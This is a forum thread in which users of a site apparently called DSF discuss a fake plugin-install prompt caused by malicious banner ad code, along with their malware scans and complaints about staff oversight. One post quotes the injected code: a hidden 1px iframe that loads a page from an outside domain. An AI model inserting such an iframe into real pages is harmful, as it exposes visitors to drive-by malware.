I clicked the install missing plugins button yesterday without thinking and it kept appearing on every DSF page. I ran a full scan and quick scan with malware bytes in safe mode and in standard mode and ran a scan in panda cloud. Nothing came up and my PC is running fine.

Am I in the clear?

I got it on your recommendation a while back.

Never had a problem with it. I just run Panda and Malware Bytes.

Which idiot let malware onto the site again because they can't be fucking arsed to check banner code / don't know what they're doing? Pretty irresponsible thing to do, exposing thousands of people's computers to potential harm, getting the site black listed by google and ISPs. At the very least you're going to piss off an awful lot of regulars.

this sort of thing doesn't go away that easily or cleanly. dubway is on it, but definitely update java, and your adblocker/malware.

lolz...

What firky says is true though, this forum has been hacked a few too many times for my liking.

he has a point though, and the real problem has been known throughout this thread. Even google knows what the problem is...

who looks over the banner codes? anyone?

Code: Select all

<iframe src='http://l3sd.co.cc/index.php?tp=7f4f8de2c33c88a7' style='width: 1px; height: 1px; border:0px;'></iframe>
mind explaining who thought a 1px by 1px in a banner source looked legit? especially since this is always how DSF gets hacked?
